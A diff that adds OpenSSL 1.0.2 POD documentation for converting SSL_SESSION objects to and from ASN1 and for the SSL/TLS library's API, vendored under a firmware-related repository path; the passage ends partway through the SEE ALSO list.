--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/d2i_SSL_SESSION.pod
@@ -0,0 +1,76 @@
+=pod
+
+=head1 NAME
+
+d2i_SSL_SESSION, i2d_SSL_SESSION - convert SSL_SESSION object from/to ASN1 representation
+
+=head1 SYNOPSIS
+
+ #include <openssl/ssl.h>
+
+ SSL_SESSION *d2i_SSL_SESSION(SSL_SESSION **a, const unsigned char **pp, long length);
+ int i2d_SSL_SESSION(SSL_SESSION *in, unsigned char **pp);
+
+=head1 DESCRIPTION
+
+d2i_SSL_SESSION() transforms the external ASN1 representation of an SSL/TLS
+session, stored as binary data at location B<pp> with length B<length>, into
+an SSL_SESSION object.
+
+i2d_SSL_SESSION() transforms the SSL_SESSION object B<in> into the ASN1
+representation and stores it into the memory location pointed to by B<pp>.
+The length of the resulting ASN1 representation is returned. If B<pp> is
+the NULL pointer, only the length is calculated and returned.
+
+=head1 NOTES
+
+The SSL_SESSION object is built from several malloc()ed parts, it can
+therefore not be moved, copied or stored directly. In order to store
+session data on disk or into a database, it must be transformed into
+a binary ASN1 representation.
+
+When using d2i_SSL_SESSION(), the SSL_SESSION object is automatically
+allocated. The reference count is 1, so that the session must be
+explicitly removed using L<SSL_SESSION_free(3)|SSL_SESSION_free(3)>,
+unless the SSL_SESSION object is completely taken over, when being called
+inside the get_session_cb() (see
+L<SSL_CTX_sess_set_get_cb(3)|SSL_CTX_sess_set_get_cb(3)>).
+
+SSL_SESSION objects keep internal link information about the session cache
+list, when being inserted into one SSL_CTX object's session cache.
+One SSL_SESSION object, regardless of its reference count, must therefore
+only be used with one SSL_CTX object (and the SSL objects created
+from this SSL_CTX object).
+
+When using i2d_SSL_SESSION(), the memory location pointed to by B<pp> must be
+large enough to hold the binary representation of the session. There is no
+known limit on the size of the created ASN1 representation, so the necessary
+amount of space should be obtained by first calling i2d_SSL_SESSION() with
+B<pp=NULL>, and obtain the size needed, then allocate the memory and
+call i2d_SSL_SESSION() again.
+Note that this will advance the value contained in B<*pp> so it is necessary
+to save a copy of the original allocation.
+For example:
+ int i,j;
+ char *p, *temp;
+ i = i2d_SSL_SESSION(sess, NULL);
+ p = temp = malloc(i);
+ j = i2d_SSL_SESSION(sess, &temp);
+ assert(i == j);
+ assert(p+i == temp);
+
+=head1 RETURN VALUES
+
+d2i_SSL_SESSION() returns a pointer to the newly allocated SSL_SESSION
+object. In case of failure the NULL-pointer is returned and the error message
+can be retrieved from the error stack.
+
+i2d_SSL_SESSION() returns the size of the ASN1 representation in bytes.
+When the session is not valid, B<0> is returned and no operation is performed.
+
+=head1 SEE ALSO
+
+L<ssl(3)|ssl(3)>, L<SSL_SESSION_free(3)|SSL_SESSION_free(3)>,
+L<SSL_CTX_sess_set_get_cb(3)|SSL_CTX_sess_set_get_cb(3)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/ssl.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/ssl.pod
new file mode 100644
index 0000000..8d5b8c3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/ssl/ssl.pod
@@ -0,0 +1,762 @@
+
+=pod
+
+=head1 NAME
+
+SSL - OpenSSL SSL/TLS library
+
+=head1 SYNOPSIS
+
+=head1 DESCRIPTION
+
+The OpenSSL B<ssl> library implements the Secure Sockets Layer (SSL v2/v3) and
+Transport Layer Security (TLS v1) protocols. It provides a rich API which is
+documented here.
+
+At first the library must be initialized; see
+L<SSL_library_init(3)|SSL_library_init(3)>.
+
+Then an B<SSL_CTX> object is created as a framework to establish
+TLS/SSL enabled connections (see L<SSL_CTX_new(3)|SSL_CTX_new(3)>).
+Various options regarding certificates, algorithms etc. can be set
+in this object.
+
+When a network connection has been created, it can be assigned to an
+B<SSL> object. After the B<SSL> object has been created using
+L<SSL_new(3)|SSL_new(3)>, L<SSL_set_fd(3)|SSL_set_fd(3)> or
+L<SSL_set_bio(3)|SSL_set_bio(3)> can be used to associate the network
+connection with the object.
+
+Then the TLS/SSL handshake is performed using
+L<SSL_accept(3)|SSL_accept(3)> or L<SSL_connect(3)|SSL_connect(3)>
+respectively.
+L<SSL_read(3)|SSL_read(3)> and L<SSL_write(3)|SSL_write(3)> are used
+to read and write data on the TLS/SSL connection.
+L<SSL_shutdown(3)|SSL_shutdown(3)> can be used to shut down the
+TLS/SSL connection.
+
+=head1 DATA STRUCTURES
+
+Currently the OpenSSL B<ssl> library functions deals with the following data
+structures:
+
+=over 4
+
+=item B<SSL_METHOD> (SSL Method)
+
+That's a dispatch structure describing the internal B<ssl> library
+methods/functions which implement the various protocol versions (SSLv1, SSLv2
+and TLSv1). It's needed to create an B<SSL_CTX>.
+
+=item B<SSL_CIPHER> (SSL Cipher)
+
+This structure holds the algorithm information for a particular cipher which
+are a core part of the SSL/TLS protocol. The available ciphers are configured
+on a B<SSL_CTX> basis and the actually used ones are then part of the
+B<SSL_SESSION>.
+
+=item B<SSL_CTX> (SSL Context)
+
+That's the global context structure which is created by a server or client
+once per program life-time and which holds mainly default values for the
+B<SSL> structures which are later created for the connections.
+
+=item B<SSL_SESSION> (SSL Session)
+
+This is a structure containing the current TLS/SSL session details for a
+connection: B<SSL_CIPHER>s, client and server certificates, keys, etc.
+
+=item B<SSL> (SSL Connection)
+
+That's the main SSL/TLS structure which is created by a server or client per
+established connection. This actually is the core structure in the SSL API.
+Under run-time the application usually deals with this structure which has
+links to mostly all other structures.
+
+=back
+
+
+=head1 HEADER FILES
+
+Currently the OpenSSL B<ssl> library provides the following C header files
+containing the prototypes for the data structures and and functions:
+
+=over 4
+
+=item B<ssl.h>
+
+That's the common header file for the SSL/TLS API.  Include it into your
+program to make the API of the B<ssl> library available. It internally
+includes both more private SSL headers and headers from the B<crypto> library.
+Whenever you need hard-core details on the internals of the SSL API, look
+inside this header file.
+
+=item B<ssl2.h>
+
+That's the sub header file dealing with the SSLv2 protocol only.
+I<Usually you don't have to include it explicitly because
+it's already included by ssl.h>.
+
+=item B<ssl3.h>
+
+That's the sub header file dealing with the SSLv3 protocol only.
+I<Usually you don't have to include it explicitly because
+it's already included by ssl.h>.
+
+=item B<ssl23.h>
+
+That's the sub header file dealing with the combined use of the SSLv2 and
+SSLv3 protocols.
+I<Usually you don't have to include it explicitly because
+it's already included by ssl.h>.
+
+=item B<tls1.h>
+
+That's the sub header file dealing with the TLSv1 protocol only.
+I<Usually you don't have to include it explicitly because
+it's already included by ssl.h>.
+
+=back
+
+=head1 API FUNCTIONS
+
+Currently the OpenSSL B<ssl> library exports 214 API functions.
+They are documented in the following:
+
+=head2 DEALING WITH PROTOCOL METHODS
+
+Here we document the various API functions which deal with the SSL/TLS
+protocol methods defined in B<SSL_METHOD> structures.
+
+=over 4
+
+=item const SSL_METHOD *B<SSLv2_client_method>(void);
+
+Constructor for the SSLv2 SSL_METHOD structure for a dedicated client.
+
+=item const SSL_METHOD *B<SSLv2_server_method>(void);
+
+Constructor for the SSLv2 SSL_METHOD structure for a dedicated server.
+
+=item const SSL_METHOD *B<SSLv2_method>(void);
+
+Constructor for the SSLv2 SSL_METHOD structure for combined client and server.
+
+=item const SSL_METHOD *B<SSLv3_client_method>(void);
+
+Constructor for the SSLv3 SSL_METHOD structure for a dedicated client.
+
+=item const SSL_METHOD *B<SSLv3_server_method>(void);
+
+Constructor for the SSLv3 SSL_METHOD structure for a dedicated server.
+
+=item const SSL_METHOD *B<SSLv3_method>(void);
+
+Constructor for the SSLv3 SSL_METHOD structure for combined client and server.
+
+=item const SSL_METHOD *B<TLSv1_client_method>(void);
+
+Constructor for the TLSv1 SSL_METHOD structure for a dedicated client.
+
+=item const SSL_METHOD *B<TLSv1_server_method>(void);
+
+Constructor for the TLSv1 SSL_METHOD structure for a dedicated server.
+
+=item const SSL_METHOD *B<TLSv1_method>(void);
+
+Constructor for the TLSv1 SSL_METHOD structure for combined client and server.
+
+=back
+
+=head2 DEALING WITH CIPHERS
+
+Here we document the various API functions which deal with the SSL/TLS
+ciphers defined in B<SSL_CIPHER> structures.
+
+=over 4
+
+=item char *B<SSL_CIPHER_description>(SSL_CIPHER *cipher, char *buf, int len);
+
+Write a string to I<buf> (with a maximum size of I<len>) containing a human
+readable description of I<cipher>. Returns I<buf>.
+
+=item int B<SSL_CIPHER_get_bits>(SSL_CIPHER *cipher, int *alg_bits);
+
+Determine the number of bits in I<cipher>. Because of export crippled ciphers
+there are two bits: The bits the algorithm supports in general (stored to
+I<alg_bits>) and the bits which are actually used (the return value).
+
+=item const char *B<SSL_CIPHER_get_name>(SSL_CIPHER *cipher);
+
+Return the internal name of I<cipher> as a string. These are the various
+strings defined by the I<SSL2_TXT_xxx>, I<SSL3_TXT_xxx> and I<TLS1_TXT_xxx>
+definitions in the header files.
+
+=item char *B<SSL_CIPHER_get_version>(SSL_CIPHER *cipher);
+
+Returns a string like "C<TLSv1/SSLv3>" or "C<SSLv2>" which indicates the
+SSL/TLS protocol version to which I<cipher> belongs (i.e. where it was defined
+in the specification the first time).
+
+=back
+
+=head2 DEALING WITH PROTOCOL CONTEXTS
+
+Here we document the various API functions which deal with the SSL/TLS
+protocol context defined in the B<SSL_CTX> structure.
+
+=over 4
+
+=item int B<SSL_CTX_add_client_CA>(SSL_CTX *ctx, X509 *x);
+
+=item long B<SSL_CTX_add_extra_chain_cert>(SSL_CTX *ctx, X509 *x509);
+
+=item int B<SSL_CTX_add_session>(SSL_CTX *ctx, SSL_SESSION *c);
+
+=item int B<SSL_CTX_check_private_key>(const SSL_CTX *ctx);
+
+=item long B<SSL_CTX_ctrl>(SSL_CTX *ctx, int cmd, long larg, char *parg);
+
+=item void B<SSL_CTX_flush_sessions>(SSL_CTX *s, long t);
+
+=item void B<SSL_CTX_free>(SSL_CTX *a);
+
+=item char *B<SSL_CTX_get_app_data>(SSL_CTX *ctx);
+
+=item X509_STORE *B<SSL_CTX_get_cert_store>(SSL_CTX *ctx);
+
+=item STACK *B<SSL_CTX_get_client_CA_list>(const SSL_CTX *ctx);
+
+=item int (*B<SSL_CTX_get_client_cert_cb>(SSL_CTX *ctx))(SSL *ssl, X509 **x509, EVP_PKEY **pkey);
+
+=item char *B<SSL_CTX_get_ex_data>(const SSL_CTX *s, int idx);
+
+=item int B<SSL_CTX_get_ex_new_index>(long argl, char *argp, int (*new_func);(void), int (*dup_func)(void), void (*free_func)(void))
+
+=item void (*B<SSL_CTX_get_info_callback>(SSL_CTX *ctx))(SSL *ssl, int cb, int ret);
+
+=item int B<SSL_CTX_get_quiet_shutdown>(const SSL_CTX *ctx);
+
+=item int B<SSL_CTX_get_session_cache_mode>(SSL_CTX *ctx);
+
+=item long B<SSL_CTX_get_timeout>(const SSL_CTX *ctx);
+
+=item int (*B<SSL_CTX_get_verify_callback>(const SSL_CTX *ctx))(int ok, X509_STORE_CTX *ctx);
+
+=item int B<SSL_CTX_get_verify_mode>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_load_verify_locations>(SSL_CTX *ctx, char *CAfile, char *CApath);
+
+=item long B<SSL_CTX_need_tmp_RSA>(SSL_CTX *ctx);
+
+=item SSL_CTX *B<SSL_CTX_new>(const SSL_METHOD *meth);
+
+=item int B<SSL_CTX_remove_session>(SSL_CTX *ctx, SSL_SESSION *c);
+
+=item int B<SSL_CTX_sess_accept>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_accept_good>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_accept_renegotiate>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_cache_full>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_cb_hits>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_connect>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_connect_good>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_connect_renegotiate>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_get_cache_size>(SSL_CTX *ctx);
+
+=item SSL_SESSION *(*B<SSL_CTX_sess_get_get_cb>(SSL_CTX *ctx))(SSL *ssl, unsigned char *data, int len, int *copy);
+
+=item int (*B<SSL_CTX_sess_get_new_cb>(SSL_CTX *ctx)(SSL *ssl, SSL_SESSION *sess);
+
+=item void (*B<SSL_CTX_sess_get_remove_cb>(SSL_CTX *ctx)(SSL_CTX *ctx, SSL_SESSION *sess);
+
+=item int B<SSL_CTX_sess_hits>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_misses>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_sess_number>(SSL_CTX *ctx);
+
+=item void B<SSL_CTX_sess_set_cache_size>(SSL_CTX *ctx,t);
+
+=item void B<SSL_CTX_sess_set_get_cb>(SSL_CTX *ctx, SSL_SESSION *(*cb)(SSL *ssl, unsigned char *data, int len, int *copy));
+
+=item void B<SSL_CTX_sess_set_new_cb>(SSL_CTX *ctx, int (*cb)(SSL *ssl, SSL_SESSION *sess));
+
+=item void B<SSL_CTX_sess_set_remove_cb>(SSL_CTX *ctx, void (*cb)(SSL_CTX *ctx, SSL_SESSION *sess));
+
+=item int B<SSL_CTX_sess_timeouts>(SSL_CTX *ctx);
+
+=item LHASH *B<SSL_CTX_sessions>(SSL_CTX *ctx);
+
+=item void B<SSL_CTX_set_app_data>(SSL_CTX *ctx, void *arg);
+
+=item void B<SSL_CTX_set_cert_store>(SSL_CTX *ctx, X509_STORE *cs);
+
+=item void B<SSL_CTX_set_cert_verify_cb>(SSL_CTX *ctx, int (*cb)(), char *arg)
+
+=item int B<SSL_CTX_set_cipher_list>(SSL_CTX *ctx, char *str);
+
+=item void B<SSL_CTX_set_client_CA_list>(SSL_CTX *ctx, STACK *list);
+
+=item void B<SSL_CTX_set_client_cert_cb>(SSL_CTX *ctx, int (*cb)(SSL *ssl, X509 **x509, EVP_PKEY **pkey));
+
+=item void B<SSL_CTX_set_default_passwd_cb>(SSL_CTX *ctx, int (*cb);(void))
+
+=item void B<SSL_CTX_set_default_read_ahead>(SSL_CTX *ctx, int m);
+
+=item int B<SSL_CTX_set_default_verify_paths>(SSL_CTX *ctx);
+
+=item int B<SSL_CTX_set_ex_data>(SSL_CTX *s, int idx, char *arg);
+
+=item void B<SSL_CTX_set_info_callback>(SSL_CTX *ctx, void (*cb)(SSL *ssl, int cb, int ret));
+
+=item void B<SSL_CTX_set_msg_callback>(SSL_CTX *ctx, void (*cb)(int write_p, int version, int content_type, const void *buf, size_t len, SSL *ssl, void *arg));
+
+=item void B<SSL_CTX_set_msg_callback_arg>(SSL_CTX *ctx, void *arg);
+
+=item void B<SSL_CTX_set_options>(SSL_CTX *ctx, unsigned long op);
+
+=item void B<SSL_CTX_set_quiet_shutdown>(SSL_CTX *ctx, int mode);
+
+=item void B<SSL_CTX_set_session_cache_mode>(SSL_CTX *ctx, int mode);
+
+=item int B<SSL_CTX_set_ssl_version>(SSL_CTX *ctx, const SSL_METHOD *meth);
+
+=item void B<SSL_CTX_set_timeout>(SSL_CTX *ctx, long t);
+
+=item long B<SSL_CTX_set_tmp_dh>(SSL_CTX* ctx, DH *dh);
+
+=item long B<SSL_CTX_set_tmp_dh_callback>(SSL_CTX *ctx, DH *(*cb)(void));
+
+=item long B<SSL_CTX_set_tmp_rsa>(SSL_CTX *ctx, RSA *rsa);
+
+=item SSL_CTX_set_tmp_rsa_callback
+
+C<long B<SSL_CTX_set_tmp_rsa_callback>(SSL_CTX *B<ctx>, RSA *(*B<cb>)(SSL *B<ssl>, int B<export>, int B<keylength>));>
+
+Sets the callback which will be called when a temporary private key is
+required. The B<C<export>> flag will be set if the reason for needing
+a temp key is that an export ciphersuite is in use, in which case,
+B<C<keylength>> will contain the required keylength in bits. Generate a key of
+appropriate size (using ???) and return it.
+
+=item SSL_set_tmp_rsa_callback
+
+long B<SSL_set_tmp_rsa_callback>(SSL *ssl, RSA *(*cb)(SSL *ssl, int export, int keylength));
+
+The same as B<SSL_CTX_set_tmp_rsa_callback>, except it operates on an SSL
+session instead of a context.
+
+=item void B<SSL_CTX_set_verify>(SSL_CTX *ctx, int mode, int (*cb);(void))
+
+=item int B<SSL_CTX_use_PrivateKey>(SSL_CTX *ctx, EVP_PKEY *pkey);
+
+=item int B<SSL_CTX_use_PrivateKey_ASN1>(int type, SSL_CTX *ctx, unsigned char *d, long len);
+
+=item int B<SSL_CTX_use_PrivateKey_file>(SSL_CTX *ctx, char *file, int type);
+
+=item int B<SSL_CTX_use_RSAPrivateKey>(SSL_CTX *ctx, RSA *rsa);
+
+=item int B<SSL_CTX_use_RSAPrivateKey_ASN1>(SSL_CTX *ctx, unsigned char *d, long len);
+
+=item int B<SSL_CTX_use_RSAPrivateKey_file>(SSL_CTX *ctx, char *file, int type);
+
+=item int B<SSL_CTX_use_certificate>(SSL_CTX *ctx, X509 *x);
+
+=item int B<SSL_CTX_use_certificate_ASN1>(SSL_CTX *ctx, int len, unsigned char *d);
+
+=item int B<SSL_CTX_use_certificate_file>(SSL_CTX *ctx, char *file, int type);
+
+=item X509 *B<SSL_CTX_get0_certificate>(const SSL_CTX *ctx);
+
+=item EVP_PKEY *B<SSL_CTX_get0_privatekey>(const SSL_CTX *ctx);
+
+=item void B<SSL_CTX_set_psk_client_callback>(SSL_CTX *ctx, unsigned int (*callback)(SSL *ssl, const char *hint, char *identity, unsigned int max_identity_len, unsigned char *psk, unsigned int max_psk_len));
+
+=item int B<SSL_CTX_use_psk_identity_hint>(SSL_CTX *ctx, const char *hint);
+
+=item void B<SSL_CTX_set_psk_server_callback>(SSL_CTX *ctx, unsigned int (*callback)(SSL *ssl, const char *identity, unsigned char *psk, int max_psk_len));
+
+
+
+
+=back
+
+=head2 DEALING WITH SESSIONS
+
+Here we document the various API functions which deal with the SSL/TLS
+sessions defined in the B<SSL_SESSION> structures.
+
+=over 4
+
+=item int B<SSL_SESSION_cmp>(const SSL_SESSION *a, const SSL_SESSION *b);
+
+=item void B<SSL_SESSION_free>(SSL_SESSION *ss);
+
+=item char *B<SSL_SESSION_get_app_data>(SSL_SESSION *s);
+
+=item char *B<SSL_SESSION_get_ex_data>(const SSL_SESSION *s, int idx);
+
+=item int B<SSL_SESSION_get_ex_new_index>(long argl, char *argp, int (*new_func);(void), int (*dup_func)(void), void (*free_func)(void))
+
+=item long B<SSL_SESSION_get_time>(const SSL_SESSION *s);
+
+=item long B<SSL_SESSION_get_timeout>(const SSL_SESSION *s);
+
+=item unsigned long B<SSL_SESSION_hash>(const SSL_SESSION *a);
+
+=item SSL_SESSION *B<SSL_SESSION_new>(void);
+
+=item int B<SSL_SESSION_print>(BIO *bp, const SSL_SESSION *x);
+
+=item int B<SSL_SESSION_print_fp>(FILE *fp, const SSL_SESSION *x);
+
+=item void B<SSL_SESSION_set_app_data>(SSL_SESSION *s, char *a);
+
+=item int B<SSL_SESSION_set_ex_data>(SSL_SESSION *s, int idx, char *arg);
+
+=item long B<SSL_SESSION_set_time>(SSL_SESSION *s, long t);
+
+=item long B<SSL_SESSION_set_timeout>(SSL_SESSION *s, long t);
+
+=back
+
+=head2 DEALING WITH CONNECTIONS
+
+Here we document the various API functions which deal with the SSL/TLS
+connection defined in the B<SSL> structure.
+
+=over 4
+
+=item int B<SSL_accept>(SSL *ssl);
+
+=item int B<SSL_add_dir_cert_subjects_to_stack>(STACK *stack, const char *dir);
+
+=item int B<SSL_add_file_cert_subjects_to_stack>(STACK *stack, const char *file);
+
+=item int B<SSL_add_client_CA>(SSL *ssl, X509 *x);
+
+=item char *B<SSL_alert_desc_string>(int value);
+
+=item char *B<SSL_alert_desc_string_long>(int value);
+
+=item char *B<SSL_alert_type_string>(int value);
+
+=item char *B<SSL_alert_type_string_long>(int value);
+
+=item int B<SSL_check_private_key>(const SSL *ssl);
+
+=item void B<SSL_clear>(SSL *ssl);
+
+=item long B<SSL_clear_num_renegotiations>(SSL *ssl);
+
+=item int B<SSL_connect>(SSL *ssl);
+
+=item void B<SSL_copy_session_id>(SSL *t, const SSL *f);
+
+=item long B<SSL_ctrl>(SSL *ssl, int cmd, long larg, char *parg);
+
+=item int B<SSL_do_handshake>(SSL *ssl);
+
+=item SSL *B<SSL_dup>(SSL *ssl);
+
+=item STACK *B<SSL_dup_CA_list>(STACK *sk);
+
+=item void B<SSL_free>(SSL *ssl);
+
+=item SSL_CTX *B<SSL_get_SSL_CTX>(const SSL *ssl);
+
+=item char *B<SSL_get_app_data>(SSL *ssl);
+
+=item X509 *B<SSL_get_certificate>(const SSL *ssl);
+
+=item const char *B<SSL_get_cipher>(const SSL *ssl);
+
+=item int B<SSL_get_cipher_bits>(const SSL *ssl, int *alg_bits);
+
+=item char *B<SSL_get_cipher_list>(const SSL *ssl, int n);
+
+=item char *B<SSL_get_cipher_name>(const SSL *ssl);
+
+=item char *B<SSL_get_cipher_version>(const SSL *ssl);
+
+=item STACK *B<SSL_get_ciphers>(const SSL *ssl);
+
+=item STACK *B<SSL_get_client_CA_list>(const SSL *ssl);
+
+=item SSL_CIPHER *B<SSL_get_current_cipher>(SSL *ssl);
+
+=item long B<SSL_get_default_timeout>(const SSL *ssl);
+
+=item int B<SSL_get_error>(const SSL *ssl, int i);
+
+=item char *B<SSL_get_ex_data>(const SSL *ssl, int idx);
+
+=item int B<SSL_get_ex_data_X509_STORE_CTX_idx>(void);
+
+=item int B<SSL_get_ex_new_index>(long argl, char *argp, int (*new_func);(void), int (*dup_func)(void), void (*free_func)(void))
+
+=item int B<SSL_get_fd>(const SSL *ssl);
+
+=item void (*B<SSL_get_info_callback>(const SSL *ssl);)()
+
+=item STACK *B<SSL_get_peer_cert_chain>(const SSL *ssl);
+
+=item X509 *B<SSL_get_peer_certificate>(const SSL *ssl);
+
+=item EVP_PKEY *B<SSL_get_privatekey>(const SSL *ssl);
+
+=item int B<SSL_get_quiet_shutdown>(const SSL *ssl);
+
+=item BIO *B<SSL_get_rbio>(const SSL *ssl);
+
+=item int B<SSL_get_read_ahead>(const SSL *ssl);
+
+=item SSL_SESSION *B<SSL_get_session>(const SSL *ssl);
+
+=item char *B<SSL_get_shared_ciphers>(const SSL *ssl, char *buf, int len);
+
+=item int B<SSL_get_shutdown>(const SSL *ssl);
+
+=item const SSL_METHOD *B<SSL_get_ssl_method>(SSL *ssl);
+
+=item int B<SSL_get_state>(const SSL *ssl);
+
+=item long B<SSL_get_time>(const SSL *ssl);
+
+=item long B<SSL_get_timeout>(const SSL *ssl);
+
+=item int (*B<SSL_get_verify_callback>(const SSL *ssl))(int,X509_STORE_CTX *)
+
+=item int B<SSL_get_verify_mode>(const SSL *ssl);
+
+=item long B<SSL_get_verify_result>(const SSL *ssl);
+
+=item char *B<SSL_get_version>(const SSL *ssl);
+
+=item BIO *B<SSL_get_wbio>(const SSL *ssl);
+
+=item int B<SSL_in_accept_init>(SSL *ssl);
+
+=item int B<SSL_in_before>(SSL *ssl);
+
+=item int B<SSL_in_connect_init>(SSL *ssl);
+
+=item int B<SSL_in_init>(SSL *ssl);
+
+=item int B<SSL_is_init_finished>(SSL *ssl);
+
+=item STACK *B<SSL_load_client_CA_file>(char *file);
+
+=item void B<SSL_load_error_strings>(void);
+
+=item SSL *B<SSL_new>(SSL_CTX *ctx);
+
+=item long B<SSL_num_renegotiations>(SSL *ssl);
+
+=item int B<SSL_peek>(SSL *ssl, void *buf, int num);
+
+=item int B<SSL_pending>(const SSL *ssl);
+
+=item int B<SSL_read>(SSL *ssl, void *buf, int num);
+
+=item int B<SSL_renegotiate>(SSL *ssl);
+
+=item char *B<SSL_rstate_string>(SSL *ssl);
+
+=item char *B<SSL_rstate_string_long>(SSL *ssl);
+
+=item long B<SSL_session_reused>(SSL *ssl);
+
+=item void B<SSL_set_accept_state>(SSL *ssl);
+
+=item void B<SSL_set_app_data>(SSL *ssl, char *arg);
+
+=item void B<SSL_set_bio>(SSL *ssl, BIO *rbio, BIO *wbio);
+
+=item int B<SSL_set_cipher_list>(SSL *ssl, char *str);
+
+=item void B<SSL_set_client_CA_list>(SSL *ssl, STACK *list);
+
+=item void B<SSL_set_connect_state>(SSL *ssl);
+
+=item int B<SSL_set_ex_data>(SSL *ssl, int idx, char *arg);
+
+=item int B<SSL_set_fd>(SSL *ssl, int fd);
+
+=item void B<SSL_set_info_callback>(SSL *ssl, void (*cb);(void))
+
+=item void B<SSL_set_msg_callback>(SSL *ctx, void (*cb)(int write_p, int version, int content_type, const void *buf, size_t len, SSL *ssl, void *arg));
+
+=item void B<SSL_set_msg_callback_arg>(SSL *ctx, void *arg);
+
+=item void B<SSL_set_options>(SSL *ssl, unsigned long op);
+
+=item void B<SSL_set_quiet_shutdown>(SSL *ssl, int mode);
+
+=item void B<SSL_set_read_ahead>(SSL *ssl, int yes);
+
+=item int B<SSL_set_rfd>(SSL *ssl, int fd);
+
+=item int B<SSL_set_session>(SSL *ssl, SSL_SESSION *session);
+
+=item void B<SSL_set_shutdown>(SSL *ssl, int mode);
+
+=item int B<SSL_set_ssl_method>(SSL *ssl, const SSL_METHOD *meth);
+
+=item void B<SSL_set_time>(SSL *ssl, long t);
+
+=item void B<SSL_set_timeout>(SSL *ssl, long t);
+
+=item void B<SSL_set_verify>(SSL *ssl, int mode, int (*callback);(void))
+
+=item void B<SSL_set_verify_result>(SSL *ssl, long arg);
+
+=item int B<SSL_set_wfd>(SSL *ssl, int fd);
+
+=item int B<SSL_shutdown>(SSL *ssl);
+
+=item int B<SSL_state>(const SSL *ssl);
+
+=item char *B<SSL_state_string>(const SSL *ssl);
+
+=item char *B<SSL_state_string_long>(const SSL *ssl);
+
+=item long B<SSL_total_renegotiations>(SSL *ssl);
+
+=item int B<SSL_use_PrivateKey>(SSL *ssl, EVP_PKEY *pkey);
+
+=item int B<SSL_use_PrivateKey_ASN1>(int type, SSL *ssl, unsigned char *d, long len);
+
+=item int B<SSL_use_PrivateKey_file>(SSL *ssl, char *file, int type);
+
+=item int B<SSL_use_RSAPrivateKey>(SSL *ssl, RSA *rsa);
+
+=item int B<SSL_use_RSAPrivateKey_ASN1>(SSL *ssl, unsigned char *d, long len);
+
+=item int B<SSL_use_RSAPrivateKey_file>(SSL *ssl, char *file, int type);
+
+=item int B<SSL_use_certificate>(SSL *ssl, X509 *x);
+
+=item int B<SSL_use_certificate_ASN1>(SSL *ssl, int len, unsigned char *d);
+
+=item int B<SSL_use_certificate_file>(SSL *ssl, char *file, int type);
+
+=item int B<SSL_version>(const SSL *ssl);
+
+=item int B<SSL_want>(const SSL *ssl);
+
+=item int B<SSL_want_nothing>(const SSL *ssl);
+
+=item int B<SSL_want_read>(const SSL *ssl);
+
+=item int B<SSL_want_write>(const SSL *ssl);
+
+=item int B<SSL_want_x509_lookup>(const SSL *ssl);
+
+=item int B<SSL_write>(SSL *ssl, const void *buf, int num);
+
+=item void B<SSL_set_psk_client_callback>(SSL *ssl, unsigned int (*callback)(SSL *ssl, const char *hint, char *identity, unsigned int max_identity_len, unsigned char *psk, unsigned int max_psk_len));
+
+=item int B<SSL_use_psk_identity_hint>(SSL *ssl, const char *hint);
+
+=item void B<SSL_set_psk_server_callback>(SSL *ssl, unsigned int (*callback)(SSL *ssl, const char *identity, unsigned char *psk, int max_psk_len));
+
+=item const char *B<SSL_get_psk_identity_hint>(SSL *ssl);
+
+=item const char *B<SSL_get_psk_identity>(SSL *ssl);
+
+=back
+
+=head1 SEE ALSO
+
+L<openssl(1)|openssl(1)>, L<crypto(3)|crypto(3)>,
+L<SSL_accept(3)|SSL_accept(3)>, L<SSL_clear(3)|SSL_clear(3)>,
+L<SSL_connect(3)|SSL_connect(3)>,
+L<SSL_CIPHER_get_name(3)|SSL_CIPHER_get_name(3)>,
+L<SSL_COMP_add_compression_method(3)|SSL_COMP_add_compression_method(3)>,
+L<SSL_CTX_add_extra_chain_cert(3)|SSL_CTX_add_extra_chain_cert(3)>,
+L<SSL_CTX_add_session(3)|SSL_CTX_add_session(3)>,
+L<SSL_CTX_ctrl(3)|SSL_CTX_ctrl(3)>,
+L<SSL_CTX_flush_sessions(3)|SSL_CTX_flush_sessions(3)>,
+L<SSL_CTX_get_ex_new_index(3)|SSL_CTX_get_ex_new_index(3)>,
+L<SSL_CTX_get_verify_mode(3)|SSL_CTX_get_verify_mode(3)>,
+L<SSL_CTX_load_verify_locations(3)|SSL_CTX_load_verify_locations(3)>
+L<SSL_CTX_new(3)|SSL_CTX_new(3)>,
+L<SSL_CTX_sess_number(3)|SSL_CTX_sess_number(3)>,
+L<SSL_CTX_sess_set_cache_size(3)|SSL_CTX_sess_set_cache_size(3)>,
+L<SSL_CTX_sess_set_get_cb(3)|SSL_CTX_sess_set_get_cb(3)>,
+L<SSL_CTX_sessions(3)|SSL_CTX_sessions(3)>,
+L<SSL_CTX_set_cert_store(3)|SSL_CTX_set_cert_store(3)>,
+L<SSL_CTX_set_cert_verify_callback(3)|SSL_CTX_set_cert_verify_callback(3)>,
+L<SSL_CTX_set_cipher_list(3)|SSL_CTX_set_cipher_list(3)>,
+L<SSL_CTX_set_client_CA_list(3)|SSL_CTX_set_client_CA_list(3)>,
+L<SSL_CTX_set_client_cert_cb(3)|SSL_CTX_set_client_cert_cb(3)>,
+L<SSL_CTX_set_default_passwd_cb(3)|SSL_CTX_set_default_passwd_cb(3)>,
+L<SSL_CTX_set_generate_session_id(3)|SSL_CTX_set_generate_session_id(3)>,
+L<SSL_CTX_set_info_callback(3)|SSL_CTX_set_info_callback(3)>,
+L<SSL_CTX_set_max_cert_list(3)|SSL_CTX_set_max_cert_list(3)>,
+L<SSL_CTX_set_mode(3)|SSL_CTX_set_mode(3)>,
